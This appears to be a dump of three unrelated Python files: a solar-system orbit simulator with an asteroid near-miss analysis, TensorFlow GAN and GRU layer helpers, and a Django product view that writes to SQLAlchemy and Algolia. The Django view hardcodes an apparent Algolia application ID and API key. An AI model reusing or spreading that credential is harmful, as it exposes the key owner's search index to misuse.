333000\n getattr(solarsystem, str(body)).radius = solarsystem.data[body][1]\n getattr(solarsystem, str(body)).xposition = solarsystem.data[body][2]\n getattr(solarsystem, str(body)).yposition = solarsystem.data[body][3]\n getattr(solarsystem, str(body)).xspeed = solarsystem.data[body][4]\n getattr(solarsystem, str(body)).yspeed = solarsystem.data[body][5]\n getattr(solarsystem, str(body)).colour = solarsystem.data[body][6]\n\n return solarsystem\n\n # def simulate(solarsystem, integrator):\n # \"\"\"Simulate solarsystem and return dictionary with visited planet trajectory coordinates and dictionary with past planet velocities\"\"\"\n # global dt\n # global steps\n # global years\n # global hour_step\n # hour_step = 10\n # years = 1\n # dt = hour_step/(365*24)\n # steps = int(years/dt)\n #\n # for body in solarsystem.data:\n # getattr(solarsystem, str(body)).xposition_list.append(getattr(solarsystem, str(body)).xposition)\n # getattr(solarsystem, str(body)).yposition_list.append(getattr(solarsystem, str(body)).yposition)\n # getattr(solarsystem, str(body)).xspeed_list.append(getattr(solarsystem, str(body)).xspeed)\n # getattr(solarsystem, str(body)).yspeed_list.append(getattr(solarsystem, str(body)).yspeed)\n # getattr(solarsystem, str(body)).xacceleration_list.append(getattr(solarsystem, str(body)).xacceleration)\n # getattr(solarsystem, str(body)).yacceleration_list.append(getattr(solarsystem, str(body)).yacceleration)\n #\n # for i in range(steps):\n # solarsystem.time += dt\n # for body in solarsystem.data:\n # update(getattr(solarsystem, str(body)), integrator)\n # getattr(solarsystem, str(body)).xposition_list.append(getattr(solarsystem, str(body)).xposition)\n # getattr(solarsystem, str(body)).yposition_list.append(getattr(solarsystem, str(body)).yposition)\n # getattr(solarsystem, str(body)).xspeed_list.append(getattr(solarsystem, str(body)).xspeed)\n # getattr(solarsystem, str(body)).yspeed_list.append(getattr(solarsystem, str(body)).yspeed)\n # getattr(solarsystem, str(body)).xacceleration_list.append(getattr(solarsystem, str(body)).xacceleration)\n # getattr(solarsystem, str(body)).yacceleration_list.append(getattr(solarsystem, str(body)).yacceleration)\n #\n #\n # ### REMOVE LATER ###\n # # if i == steps/2 and body == \"earth\":\n # # print(body, \"xposition is\", solarsystem.earth.xposition)\n # # print(body, \"yposition is\", solarsystem.earth.yposition)\n # # print(\"asteroid xposition is\", solarsystem.asteroid.xposition)\n # # print(\"asteroid yposition is\", solarsystem.asteroid.yposition)\n # # return position_dict, velocity_dict\n #\n # ## ###\n #\n # return None\n\n # def draw(inner = True):\n # \"\"\"Plot all planets' trajectory\"\"\"\n #\n # for body in solarsystem.data:\n #\n # # Change axis to million miles\n # # getattr(solarsystem, str(body)).yposition_list = [x * 92.955807 for x in getattr(solarsystem, str(body)).yposition_list]\n # # getattr(solarsystem, str(body)).yposition_list = [x * 92.955807 for x in getattr(solarsystem, str(body)).yposition_list]\n #\n # ax.plot(getattr(solarsystem, str(body)).xposition_list,getattr(solarsystem, str(body)).yposition_list, color=getattr(solarsystem, str(body)).colour, linestyle='solid', markersize = 2)\n # ax.plot(getattr(solarsystem, str(body)).xposition_list[-1],getattr(solarsystem, str(body)).yposition_list[-1], color=getattr(solarsystem, str(body)).colour, marker = \"o\", markersize = 0.08*getattr(solarsystem, str(\"sun\")).radius + 0.9*math.log(getattr(solarsystem, str(body)).radius/getattr(solarsystem, 
str(\"sun\")).radius))\n #\n # # Add tetboxes for objects\n # if body == \"asteroid\":\n # ax.text(getattr(solarsystem, str(body)).xposition_list[-1],getattr(solarsystem, str(body)).yposition_list[-1]+0.1, getattr(solarsystem, str(body)).name, color=getattr(solarsystem, str(body)).colour, fontsize = 15, zorder = 2)\n # else:\n # if inner == True:\n # arc_percent = int(0.8*len(getattr(solarsystem, str(body)).xposition_list))\n # ax.text(getattr(solarsystem, str(body)).xposition_list[-1],getattr(solarsystem, str(body)).yposition_list[-1]+0.1, getattr(solarsystem, str(body)).name, color=getattr(solarsystem, str(body)).colour, fontsize = 15, zorder = 2)\n #\n # # if body == \"jupiter\":\n # # ax.text(getattr(solarsystem, str(body)).xposition_list[arc_percent],getattr(solarsystem, str(body)).yposition_list[arc_percent]+0.5, getattr(solarsystem, str(body)).name, color=getattr(solarsystem, str(body)).colour, fontsize = 15, zorder = 2)\n # # elif body == \"mercury\":\n # # ax.text(getattr(solarsystem, str(body)).xposition_list[arc_percent],getattr(solarsystem, str(body)).yposition_list[arc_percent]+0.5, getattr(solarsystem, str(body)).name, color=getattr(solarsystem, str(body)).colour, fontsize = 15, zorder = 2)\n # # else:\n # # ax.text(getattr(solarsystem, str(body)).xposition_list[-1],getattr(solarsystem, str(body)).yposition_list[-1]+0.1, getattr(solarsystem, str(body)).name, color=getattr(solarsystem, str(body)).colour, fontsize = 15, zorder = 2)\n #\n # elif inner == False:\n # ax.text(getattr(solarsystem, str(body)).xposition_list[4000],getattr(solarsystem, str(body)).yposition_list[4000]+0.2, getattr(solarsystem, str(body)).name, color=getattr(solarsystem, str(body)).colour, fontsize = 15, zorder = 2)\n #\n #\n # plt.show(block=True)\n\n def animate(x_list, y_list, colour):\n \"\"\"Continually draw animation\"\"\"\n plt.plot(x_list,y_list, color=colour, linestyle='solid', markersize = 2)\n plt.show(block=False)\n plt.pause(0.00000000000000000001)\n\n # def update(obj, integrator):\n # \"\"\"Update position\"\"\"\n #\n # x_force, y_force = forcefunction(obj)\n #\n # if integrator == \"Verlet\":\n # _update_verlet(obj,[x_force,y_force])\n #\n # elif integrator == \"EC\":\n # _update_EC(obj,[x_force,y_force])\n #\n # def _update_EC(obj, forcevector):\n # \"\"\"Update position with euler cromer integration\"\"\"\n #\n # obj.xacceleration = forcevector[0] / obj.mass\n # obj.yacceleration = forcevector[1] / obj.mass\n #\n # obj.xspeed += obj.xacceleration*dt\n # obj.yspeed += obj.yacceleration*dt\n #\n # obj.xposition += obj.xspeed * dt\n # obj.yposition += obj.yspeed * dt\n #\n # def _update_verlet(obj, forcevector):\n # \"\"\"Update position with Verlet integration\"\"\"\n #\n # obj.xacceleration = forcevector[0] / obj.mass\n # obj.yacceleration = forcevector[1] / obj.mass\n #\n # #Integrator\n #\n # obj.xposition = obj.xposition + obj.xspeed * dt + 0.5*obj.xacceleration*dt*dt\n # obj.yposition = obj.yposition + obj.yspeed * dt + 0.5*obj.yacceleration*dt*dt\n #\n # new_x_force, new_y_force = forcefunction(obj)\n #\n # new_obj_x_acceleration = new_x_force/obj.mass\n # new_obj_y_acceleration = new_y_force/obj.mass\n #\n # obj.xspeed += 0.5*(new_obj_x_acceleration+obj.xacceleration)*dt\n # obj.yspeed += 0.5*(new_obj_y_acceleration+obj.yacceleration)*dt\n #\n # def forcefunction(obj):\n # \"\"\"Calculate force on object and return force in x and y direction\"\"\"\n # x_force = 0\n # y_force = 0\n # for body in solarsystem.data:\n # if body == obj.name: #Do not want force on itself\n # continue\n 
#\n # # if body != \"sun\": #Only sun exerts force\n # # continue\n #\n # forcevector = _forcefunction(obj, getattr(solarsystem, str(body)))\n # x_force += forcevector[0]\n # y_force += forcevector[1]\n #\n # return x_force, y_force\n #\n # def _forcefunction(obj1, obj2):\n # \"\"\"Calculate and return the mutual attracting force between object 1 and object 2 in list [F1, F2] where F1 is x-force and y-force in direction from obj1 to obj2 and F2 is in direction from obj2 to obj1\"\"\"\n # global G\n # G = 39.478 / (333000) # Unit: (astronomical units cubed) per (years squared) per (Earth mass)\n # r = [obj2.xposition - obj1.xposition, obj2.yposition- obj1.yposition] #Unit vector from obj1 to obj2\n # distance_squared = r[0]**2+r[1]**2\n # r_hat = [r[0]/(distance_squared**0.5), r[1]/(distance_squared**0.5)]\n # force = G*obj1.mass*obj2.mass/distance_squared\n # return [r_hat[0]*force,r_hat[1]*force]\n\n # def energy_results():\n # \"\"\"Generate energy result figures\"\"\"\n # global hour_step\n # global hour_list\n # global solarsystem\n # energy_canvas()\n # hour_list = [1,48,96]\n #\n # for hour_step in hour_list:\n # for integrator in [\"EC\",\"Verlet\"]:\n #\n # if integrator == \"EC\":\n # continue\n # integrator_string = \"Euler-Cromer\"\n # else:\n # integrator_string = \"Verlet\"\n #\n # solarsystem = create_solarsystem()\n # simulate(solarsystem, str(integrator))\n #\n # # solarsystem_canvas_setup(integrator_string)\n # # asteroid_earth()\n # # draw()\n #\n # for body in solarsystem.data:\n # assert len(getattr(solarsystem, str(body)).total_energy_list) == len(getattr(solarsystem, str(body)).potential_energy_list) == len(getattr(solarsystem, str(body)).kinetic_energy_list) == 0\n #\n # if body != \"earth\":\n # continue\n #\n # energy_lists(getattr(solarsystem, str(body)))\n #\n # #Generate error lists\n # start_energy_total = getattr(solarsystem, str(body)).total_energy_list[0]\n # getattr(solarsystem, str(body)).total_energy_list = [abs((x-start_energy_total)/start_energy_total) for x in getattr(solarsystem, str(body)).total_energy_list]\n # earth_ax.set_title(\"Earth's relative total energy error using Verlet integration.\" + \"\\n\" + \"Different time steps are displayed\", fontsize=30)\n #\n #\n # plot_energy_EC_vs_Verlet(getattr(solarsystem, str(body)), \"total\", integrator)\n # # plot_energy_EC_vs_Verlet(getattr(solarsystem, str(body)), \"potential\", integrator)\n # # plot_energy_EC_vs_Verlet(getattr(solarsystem, str(body)), \"kinetic\", integrator)\n # getattr(solarsystem, str(body)).total_energy_list = []\n # getattr(solarsystem, str(body)).potential_energy_list = []\n # getattr(solarsystem, str(body)).kinetic_energy_list = []\n #\n #\n # plt.show()\n #\n # def plot_energy_EC_vs_Verlet(obj, type, integrator):\n # \"\"\"Plot the graphs\"\"\"\n #\n # iterations = np.arange(0, years + 0.1*hour_step/(24*365), hour_step/(24*365)) # Years on x-axis\n # # obj.potential_energy_list = [x*1000 for x in obj.potential_energy_list]\n # if integrator == \"EC\":\n # if hour_step == hour_list[0]:\n # if type == \"total\":\n # earth_ax.plot(iterations,obj.total_energy_list,color = \"#f0b27a\", linestyle = \"solid\", label = \"dt = \" + 
str(hour_list[0]) + \" hour\")\n #\n # elif hour_step == hour_list[1]:\n # if type == \"total\":\n # earth_ax.plot(iterations,obj.total_energy_list,color = \"#3498db\", linestyle = \"dashdot\", label = \"dt = \" + str(hour_list[1]) + \" hours\")\n # elif type == \"potential\":\n # earth_ax.plot(iterations,obj.potential_energy_list,color = \"#3498db\", linestyle = \"dashdot\", label = \"dt = \" + str(hour_list[1]) + \" hours\")\n # elif type == \"kinetic\":\n # earth_ax.plot(iterations,obj.kinetic_energy_list,color = \"Green\", linestyle = \"dashdot\", label = \"dt = \" + str(hour_list[1]) + \" hours\")\n #\n # elif hour_step == hour_list[2]:\n # if type == \"total\":\n # earth_ax.plot(iterations,obj.total_energy_list,color = \"Green\", linestyle = \"dotted\", label = \"dt = \" + str(hour_list[2]) + \" hours\")\n # elif type == \"potential\":\n # earth_ax.plot(iterations,obj.potential_energy_list,color = \"#3498db\", linestyle = \"dotted\", label = \"dt = \" + str(hour_list[2]) + \" hours\")\n # elif type == \"kinetic\":\n # earth_ax.plot(iterations,obj.kinetic_energy_list,color = \"Green\", linestyle = \"dotted\", label = \"dt = \" + str(hour_list[2]) + \" hours\")\n #\n # elif integrator == \"Verlet\":\n # if hour_step == hour_list[0]:\n # if type == \"total\":\n # earth_ax.plot(iterations,obj.total_energy_list,color = \"#f0b27a\", linestyle = \"solid\", label = \"dt = \" + str(hour_list[0]) + \" hour\")\n # elif type == \"potential\":\n # earth_ax.plot(iterations,obj.potential_energy_list,color = \"#3498db\", linestyle = \"solid\", label = \"dt = \" + str(hour_list[0]) + \" hour\")\n # elif type == \"kinetic\":\n # earth_ax.plot(iterations,obj.kinetic_energy_list,color = \"Green\", linestyle = \"solid\", label = \"dt = \" + str(hour_list[0]) + \" hour\")\n #\n # elif hour_step == hour_list[1]:\n # if type == \"total\":\n # earth_ax.plot(iterations,obj.total_energy_list,color = \"#3498db\", linestyle = \"dashdot\", label = \"dt = \" + str(hour_list[1]) + \" hours\")\n # elif type == \"potential\":\n # earth_ax.plot(iterations,obj.potential_energy_list,color = \"#3498db\", linestyle = \"dashdot\", label = \"dt = \" + str(hour_list[1]) + \" hours\")\n # elif type == \"kinetic\":\n # earth_ax.plot(iterations,obj.kinetic_energy_list,color = \"Green\", linestyle = \"dashdot\", label = \"dt = \" + str(hour_list[1]) + \" hours\")\n #\n # elif hour_step == hour_list[2]:\n # if type == \"total\":\n # earth_ax.plot(iterations,obj.total_energy_list,color = \"Green\", linestyle = \"dotted\", label = \"dt = \" + str(hour_list[2]) + \" hours\")\n # elif type == \"potential\":\n # earth_ax.plot(iterations,obj.potential_energy_list,color = \"#3498db\", linestyle = \"dotted\", label = \"dt = \" + str(hour_list[2]) + \" hours\")\n # elif type == \"kinetic\":\n # earth_ax.plot(iterations,obj.kinetic_energy_list,color = \"Green\", linestyle = \"dotted\", label = \"dt = \" + str(hour_list[2]) + \" hours\")\n # earth_ax.legend(prop={'size': 20})\n #\n # def energy_lists(obj):\n # \"\"\"Fill all lists of total, potential and kinetic energy\"\"\"\n #\n # assert len(obj.xposition_list) == len(obj.yposition_list) == len(obj.xspeed_list) == len(obj.yspeed_list)\n # for i in range(len(obj.xposition_list)):\n # x_position = obj.xposition_list[i]\n # y_position = obj.yposition_list[i]\n # x_speed = obj.xspeed_list[i]\n # y_speed = obj.yspeed_list[i]\n #\n # kinetic_energy = 0.5*obj.mass*(x_speed**2+y_speed**2)\n # # Calculating potential energy\n # potential_energy = 0\n # for M in solarsystem.data:\n # if obj.name == 
M: #Do not want energy from itself\n # continue\n # r = [x_position - getattr(solarsystem, str(M)).xposition_list[i], y_position - getattr(solarsystem, str(M)).yposition_list[i]] #Unit vector from body to M\n # distance = (r[0]**2+r[1]**2)**0.5\n # potential_energy += -1*G*getattr(solarsystem,str(M)).mass*obj.mass / distance\n #\n # total_energy = potential_energy + kinetic_energy\n #\n # obj.total_energy_list.append(total_energy)\n # obj.potential_energy_list.append(potential_energy)\n # obj.kinetic_energy_list.append(kinetic_energy)\n # return\n #\n # def energy_canvas(type=\"earth\"):\n # \"\"\"Setup energy canvas\"\"\"\n # if type == \"earth\":\n # global earth_fig, earth_ax\n # earth_fig, earth_ax = plt.subplots()\n # earth_ax.set_facecolor(\"#17202a\")\n # earth_ax.tick_params(axis='x', labelsize=20)\n # earth_ax.tick_params(axis='y', labelsize=20)\n # earth_ax.set_xlabel('Time [Earth-years]', fontsize=28)\n # unitstr = r'$Earthmass \\times \\frac{{AU}^2}{{Earthyear}^2}$'\n # # earth_ax.set_ylabel('Energy ['+unitstr+']', fontsize=28)\n # earth_ax.set_ylabel('Relative total energy error', fontsize=28)\n #\n # earth_ax.set(ylim=(-80, 80))\n #\n # # Set title\n # earth_ax.set_title(\"Total energy using Verlet integration.\" + \"\\n\" + \"Different time steps are displayed\", fontsize=30)\n # earth_ax.set_title(\"Total energy using Euler-Cromer integration.\" + \"\\n\" + \"Different time steps are displayed\", fontsize=30)\n #\n #\n # elif type == \"solarsystem\":\n # global system_fig, system_ax\n # system_fig, system_ax = plt.subplots()\n # system_ax.set_facecolor(\"#17202a\")\n\n def asteroid_results():\n \"\"\"Plotting the results\"\"\"\n asteroid_canvas()\n distance_list, acceleration_list, earth_displacement = asteroid_earth()\n iterations = np.arange(0, years*24*365+0.3*hour_step, hour_step)\n iterations = np.arange(0, years + 0.1*hour_step/(24*365), hour_step/(24*365))\n\n ast_ax.plot(iterations, distance_list, color = \"#5D6D7E\")\n ast2_ax.plot(iterations, earth_displacement, color = \"blue\")\n plt.show()\n\n def asteroid_canvas():\n \"Setup canvas\"\n global ast_fig, ast_ax, ast2_ax\n\n ast_fig, ast_ax = plt.subplots()\n ast_ax.set_facecolor(\"#17202a\")\n ast_ax.tick_params(axis='x', labelsize=20)\n ast_ax.tick_params(axis='y', labelsize=20)\n ast_ax.set_xlabel('Time [Hours]', fontsize=28)\n ast_ax.set_ylabel(\"Asteroid distance to earth [AU]\", fontsize=28)\n ast_ax.tick_params(axis='y', labelcolor=\"#5D6D7E\")\n\n\n ast2_ax = ast_ax.twinx()\n ast2_ax.tick_params(axis='x', labelsize=20)\n ast2_ax.tick_params(axis='y', labelsize=20, color=solarsystem.earth.colour)\n # ast2_ax.set_ylabel('Acceleration on earth ['+ r'$\\frac{AU}{{Earthyear}^2}$' +\"]\", fontsize=28)\n ast2_ax.set_ylabel('Earths relative displacement', fontsize=28)\n\n ast2_ax.tick_params(axis='y', labelcolor= \"blue\")\n\n # Set title\n ast_ax.set_title(\"Near miss for Earth and Asteroid with mass \"+str(solarsystem.asteroid.mass) + \" times that of Earth's \\n\" + \"Time step = 10 minutes\", fontsize=30)\n ast_ax.set_title(\"Near miss for Earth and Asteroid with mass \"+str(solarsystem.asteroid.mass) + \" times that of Earth's \\n\" + \"Time step = \"+ str(hour_step) + \" hour\", fontsize=30)\n\n def asteroid_earth():\n\n distance_list = []\n acceleration_list = [] #Acceleration on asteroid\n earth_displacement = [] #Earth displacement because of asteroid\n\n biggest_acceleration = 0\n time_of_biggest_acceleration = None\n\n shortest_distance = 10**100 # Random big number\n time_of_shortest_distance = None
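\n\n # The loop below steps through the recorded trajectories sample by sample and\n # computes the asteroid-Earth distance, the magnitude of Earth's acceleration,\n # and Earth's displacement relative to an ideal circular one-year orbit,\n # keeping track of the extreme values along the way.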
\n\n assert len(solarsystem.asteroid.xposition_list) == len(solarsystem.asteroid.yposition_list) == len(solarsystem.earth.xposition_list) == len(solarsystem.earth.yposition_list)\n for i in range(len(getattr(solarsystem, str(solarsystem.asteroid.name)).xposition_list)):\n\n #Distance\n r = np.sqrt((solarsystem.asteroid.xposition_list[i] - solarsystem.earth.xposition_list[i])**2 + (solarsystem.asteroid.yposition_list[i] - solarsystem.earth.yposition_list[i])**2)\n distance_list.append(r)\n\n #Acceleration\n acceleration = np.sqrt(solarsystem.earth.xacceleration_list[i]**2 + solarsystem.earth.yacceleration_list[i]**2)\n acceleration_list.append(acceleration)\n\n #Earth's deviation\n expected_r = [np.cos(2*math.pi*i*dt),np.sin(2*math.pi*i*dt)]\n actual_r = [solarsystem.earth.xposition_list[i], solarsystem.earth.yposition_list[i]]\n displacement = np.sqrt((expected_r[0]-actual_r[0])**2 +(expected_r[1]-actual_r[1])**2)\n earth_displacement.append(displacement/np.sqrt(expected_r[0]**2 + expected_r[1]**2))\n\n if r < shortest_distance:\n shortest_distance = r\n time_of_shortest_distance = (i+1)*dt\n if acceleration > biggest_acceleration:\n biggest_acceleration = acceleration\n time_of_biggest_acceleration = (i+1)*dt\n\n print(\"Shortest distance is\", shortest_distance, \"at time\", time_of_shortest_distance)\n print(\"Biggest acceleration is\", biggest_acceleration, \"at time\", time_of_biggest_acceleration)\n return distance_list, acceleration_list, earth_displacement\n\n # def solarsystem_canvas_setup(integrator_string, length=\"AU\", size=\"large\"):\n # \"\"\"Setting up canvas\"\"\"\n # global fig\n # global ax\n # fig, ax = plt.subplots()\n #\n #\n # ax.set_facecolor(\"#17202a\")\n # if hour_step == 1:\n # ax.set_title(\"Solar system simulation with \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Simulation time = \" + str(years)+ \" earth-years. Time step = \"+ str(hour_step) + \" hour\", fontsize=30)\n # else:\n # # ax.set_title(\"Asteroid with mass of Uranus using \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Simulation time = \" + str(years)+ \" earth-years. Time step = 10 minutes\", fontsize=30)\n # # ax.set_title(\"Asteroid with mass of Jupiter using \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Simulation time = \" + str(years)+ \" earth-years. Time step = 10 minutes\", fontsize=30)\n # # ax.set_title(\"Asteroid with one tenth of the mass of the sun. Simulated using \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Simulation time = \" + str(years)+ \" earth-years. Time step = 10 minutes\", fontsize=30)\n # ax.set_title(\"Asteroid with the mass of the sun. Simulated using \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Simulation time = \" + str(years)+ \" earth-years. Time step = 10 minutes\", fontsize=30)\n #\n #\n # # ax.set_title(\"Asteroid near miss with \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Time step = 10 minutes\", fontsize=30)\n # # ax.set_title(\"Asteroid near miss with \" + str(integrator_string) + \" integration.\" + \"\\n\" + \"Simulation time = \" + str(years)+ \" earth-years. 
Time step = 10 minutes\", fontsize=30)\n #\n #\n #\n # ax.tick_params(axis='x', labelsize=20)\n # ax.tick_params(axis='y', labelsize=20)\n #\n # if length == \"miles\":\n # ax.set_xlabel('Distance [Million Miles]', fontsize=28)\n # ax.set_ylabel('Distance [Million Miles]', fontsize=28)\n # else:\n # ax.set_xlabel('Distance [AU]', fontsize=28)\n # ax.set_ylabel('Distance [AU]', fontsize=28)\n #\n # if size == \"small\":\n # ax.set(xlim=(0.66, 0.68), ylim=(-0.76, -0.74))\n # else:\n # ax.set(xlim=(-32, 32), ylim=(-32, 32))\n\n\n\n #[mass (eathmasses), radius (eathradiuses), x-position (Astronomical units), y-position (Astronomical units), x-speed (AU per earth-year), y-speed (AU per earth-year), colour]\n # global solarsystem.data\n # solarsystem.data = {\n # \"sun\": [333000, 109, 0, 0, 0, 0, \"#f7dc6f\"],\n # \"mercury\": [0.055, 0.3829, 0.387, 0, 0, (47.362/29.78)*(2*math.pi), \"#b2babb\"],\n # \"venus\": [0.815, 0.95, 0.72, 0, 0, (35.02/29.78)*(2*math.pi), \"#f9e79f\"],\n # \"earth\": [1, 1, 1, 0, 0, 2*math.pi, \"#3498db\"],\n # \"mars\": [0.107, 0.53, 1.52, 0, 0, (24.097/29.78)*(2*math.pi), \"red\"],\n # \"jupiter\": [318, 10.97, 5.2, 0, 0, (13.07/29.78)*(2*math.pi), \"#f0b27a\"],\n # \"saturn\": [95.159, 58232/6371, 9.58, 0, 0, (9.68/29.78)*(2*math.pi), \"#af601a\"],\n # \"uranus\": [14.536, 4, 19.21, 0, 0, (6.8/29.78)*(2*math.pi), \"#85c1e9\"],\n # \"neptune\": [17.147, 24622/6371, 30.07, 0, 0, (5.43/29.78)*(2*math.pi), \"#1f618d\"],\n # \"asteroid\": [0.01, 1, 0.74854, -12.004, 0, 4*math.pi, \"#b2babb\"] #Near earth\n # }\n\n integrator = \"EC\"\n integrator_string = \"Euler-Cromer\"\n integrator = \"Verlet\"\n integrator_string = \"Verlet\"\n\n solarsystem = create_solarsystem()\n import importlib\n simulate = importlib.import_module(\"simulate\")\n simulate.simulate(solarsystem, integrator)\n # simulate(solarsystem, str(integrator))\n graphics = importlib.import_module(\"graphics\")\n graphics.solarsystem_canvas_setup(solarsystem, integrator_string)\n graphics.draw(solarsystem)\n # asteroid_results()\n # energy_results()\n\n\n\n\nif __name__ == \"__main__\": main()\n\n\n\n\n# TODO\n# Move energy related functions to another file\n# Create animation\n# Create GUI (includes tidying code for canvas setup amongst others)\n# Create API that fetch real life data\n# Create 3D animation\n\n\n\n# IDEAS\n","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":31855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"383043614","text":"\"\"\"\nMost codes from https://github.com/carpedm20/DCGAN-tensorflow\n\"\"\"\nimport math\nimport numpy as np \nimport tensorflow as tf\n\nfrom tensorflow.python.framework import ops\n\nfrom utils import *\n\nif \"concat_v2\" in dir(tf):\n def concat(tensors, axis, *args, **kwargs):\n return tf.concat_v2(tensors, axis, *args, **kwargs)\nelse:\n def concat(tensors, axis, *args, **kwargs):\n return tf.concat(tensors, axis, *args, **kwargs)\n\ndef bn(x, is_training, scope):\n return tf.contrib.layers.batch_norm(x,\n decay=0.9,\n updates_collections=None,\n epsilon=1e-5,\n scale=True,\n is_training=is_training,\n scope=scope)\n\ndef conv_out_size_same(size, stride):\n return int(math.ceil(float(size) / float(stride)))\n\ndef conv_cond_concat(x, y):\n \"\"\"Concatenate conditioning vector on feature map axis.\"\"\"\n x_shapes = x.get_shape()\n y_shapes = y.get_shape()\n return concat([x, y*tf.ones([x_shapes[0], x_shapes[1], x_shapes[2], y_shapes[3]])], 3)\n\ndef conv2d(input_, 
output_dim, k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02, name=\"conv2d\"):\n with tf.variable_scope(name):\n w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],\n initializer=tf.truncated_normal_initializer(stddev=stddev))\n conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')\n\n biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))\n conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())\n\n return conv\n\ndef deconv2d(input_, output_shape, k_h=5, k_w=5, d_h=2, d_w=2, name=\"deconv2d\", stddev=0.02, with_w=False):\n with tf.variable_scope(name):\n # filter : [height, width, output_channels, in_channels]\n w = tf.get_variable('w', [k_h, k_w, output_shape[-1], input_.get_shape()[-1]],\n initializer=tf.random_normal_initializer(stddev=stddev))\n\n try:\n deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape, strides=[1, d_h, d_w, 1])\n\n # Support for versions of TensorFlow before 0.7.0\n except AttributeError:\n deconv = tf.nn.deconv2d(input_, w, output_shape=output_shape, strides=[1, d_h, d_w, 1])\n\n biases = tf.get_variable('biases', [output_shape[-1]], initializer=tf.constant_initializer(0.0))\n deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())\n\n if with_w:\n return deconv, w, biases\n else:\n return deconv\n\ndef lrelu(x, leak=0.2, name=\"lrelu\"):\n return tf.maximum(x, leak*x)\n\ndef linear(input_, output_size, scope=None, stddev=0.02, bias_start=0.0, with_w=False):\n shape = input_.get_shape().as_list()\n\n with tf.variable_scope(scope or \"Linear\"):\n matrix = tf.get_variable(\"Matrix\", [shape[1], output_size], tf.float32,\n tf.random_normal_initializer(stddev=stddev))\n bias = tf.get_variable(\"bias\", [output_size],\n initializer=tf.constant_initializer(bias_start))\n if with_w:\n return tf.matmul(input_, matrix) + bias, matrix, bias\n else:\n return tf.matmul(input_, matrix) + bias\n\n\ndef gru(previous_hidden_state, x, scope=None):\n\n with tf.variable_scope(scope or \"GRU\"):\n\n #TODO - can be accelerated (?)\n\n input_shape = x.get_shape().as_list()\n hidden_layer_shape = previous_hidden_state.get_shape().as_list()\n\n Wz = tf.get_variable('Wz',shape=[input_shape[1],hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n bz = tf.get_variable('bz',shape=[hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n Wr = tf.get_variable('Wr',shape=[input_shape[1],hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n br = tf.get_variable('br',shape=[hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n Wx = tf.get_variable('Wx',shape=[input_shape[1],hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n Wh = tf.get_variable('Wh',shape=[hidden_layer_shape[1],hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n Wo = tf.get_variable('Wo',shape=[hidden_layer_shape[1],hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n bo = tf.get_variable('bo',shape=[hidden_layer_shape[1]],dtype=tf.float32,initializer=tf.contrib.layers.xavier_initializer())\n\n z = tf.sigmoid(tf.matmul(x, Wz) + bz)\n r = tf.sigmoid(tf.matmul(x, Wr) + br)\n\n h_ = tf.tanh(tf.matmul(x, Wx) +\n tf.matmul(previous_hidden_state, Wh) * r)\n\n current_hidden_state = tf.multiply(\n (1 - z), h_) + tf.multiply(previous_hidden_state, z)
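\n\n # For reference, the gate equations implemented above are:\n #   z = sigmoid(x Wz + bz)             (update gate)\n #   r = sigmoid(x Wr + br)             (reset gate)\n #   h_ = tanh(x Wx + (h_prev Wh) * r)  (candidate state)\n #   h = (1 - z) * h_ + z * h_prev\n # with a ReLU read-out computed below: output = relu(h Wo + bo).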
\n\n output = tf.nn.relu(tf.matmul(current_hidden_state, Wo) + bo)\n\n return current_hidden_state , output\n","sub_path":"src/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"389369632","text":"from django.shortcuts import render\nimport sqlalchemy, sqlalchemy.orm\nfrom .models import Base, Products, session\nfrom django.http import HttpResponseRedirect\nimport factory\nfrom sqlalchemy import orm\n\nfrom algoliasearch.search_client import SearchClient\nfrom algolia import settings\n\n\n# sqlalchemy session\n# engine = sqlalchemy.create_engine('sqlite:///loose.sqlite')\n# Session = sqlalchemy.orm.sessionmaker(bind=engine)\n# session = Session()\n# Base.metadata.create_all(engine)\n\n# For algolia data upload\nclient = SearchClient.create('5MOBI7FV78', '7a2c03f64a54f740cea34a137587a887')\nindex = client.init_index('products')\n\n# Home page\ndef productList(request):\n rows = session.query(Products).count()\n products = session.query(Products).all()\n context = {\n 'products':products,\n 'rows':rows\n }\n return render(request, 'product-list.html', context)\n\n# add the product and redirect to product list page\ndef productAdd(request):\n if request.method == 'POST':\n if request.POST:\n name = request.POST.get('name')\n model_number = request.POST.get('model-number')\n character = request.POST.get('character')\n brand = request.POST.get('brand')\n description = request.POST.get('description')\n product = Products(request.POST.get('name'), request.POST.get('model_number'), request.POST.get('character'), request.POST.get('brand'), request.POST.get('description'))\n session.add(product)\n session.commit()\n\n # save to algolia\n product = {'name': name, 'model_number': model_number, 'character': character, 'brand': brand, 'description': description}\n index.save_object(product, {'autoGenerateObjectIDIfNotExist': True})\n return HttpResponseRedirect('/')\n else:\n print('well shit')\n\n context = {\n\n }\n return render(request, 'product-add.html', context)\n\ndef productDetail(request, id):\n product = index.get_object(id)\n context = {\n 'product':product\n }\n return render(request, 